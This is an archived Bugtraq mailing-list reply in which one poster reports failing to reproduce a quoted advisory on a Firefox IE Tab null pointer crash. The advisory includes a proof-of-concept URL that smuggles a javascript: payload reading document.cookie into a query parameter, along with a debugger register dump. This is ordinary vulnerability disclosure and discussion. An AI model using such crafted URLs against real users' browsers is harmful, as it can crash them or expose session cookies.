Re: Firefox (with IETab Plugin) Null Pointer Dereferences Bug May 19 2006 07:13AM
Roman Daszczyszak (romandas gmail com)
Using Firefox 1.5.0.3 and IE Tab 1.0.9 on a Windows XP Pro SP2 +
latest patches, I was unable to reproduce this using your PoC
provided.

I created a new tab, pasted the URL you provided into it, hit enter
and received an 'Action Cancelled' page from IE. Neither Firefox nor
IE crashed.

Was there something more to the bug that I am not seeing?

Regards,
Roman

> ---------- Forwarded message ----------
> From: "Debasis Mohanty" <debasis (at) hackingspirits (dot) com [email concealed]>
> To: <bugtraq (at) securityfocus (dot) com [email concealed]>
> Date: Wed, 17 May 2006 23:48:23 +0530
> Subject: Firefox (with IETab Plugin) Null Pointer Dereferences Bug
> Firefox (with IETab Plugin) Null Pointer Dereferences Bug
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Vendor: Mozilla
> Product: FireFox with IE Tab
>
> Tested On:
> FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)
>
> Introduction:
> IETab (https://addons.mozilla.org/firefox/1419/) is a recently released
> (April 12, 2006) plugin for Firefox. It is used to browse IE (only) specific
> sites under Firefox. Guess what ?? You can run windowsupdate under FireFox
> ;-)
>
> Bug Details:
> Firefox with the IETab installed crashes when ietab plugin is unable to
> handle specific javascripts. It seems to be a null pointer dereference bug.
> For more details refer the PoC section.
>
> Proof-of-Concept:
> Copy & paste the following URL to the Firefox addressbar and press enter -
>
> chrome://ietab/content/reloaded.html?url=javascript:alert(document.cooki
e);
>
> Note: This test will not work if IETab is not installed.
>
> The Registers details after the crash:
>
> (1e4.3e0): Access violation - code c0000005 (first chance) First chance
> exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0 nv up ei pl zr na po
> nc
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
> efl=00010246
>
> npietab!NP_GetEntryPoints+0xb8ac:
>
> 0192e7dc 668b10 mov dx,[eax]
> ds:0023:00000000=????
> 0:000> g
> (1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
> edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0 nv up ei pl zr na po
> nc
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
> efl=00000246
> npietab!NP_GetEntryPoints+0xb8ac:
> 0192e7dc 668b10 mov dx,[eax]
> ds:0023:00000000=????
>
>
>
> For more vulnerabilities : http://hackingspirits.com/vuln-rnd/vuln-rnd.html
>
>
> Credits:
> Debasis Mohanty (aka Tr0y)
> www.hackingspirits.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus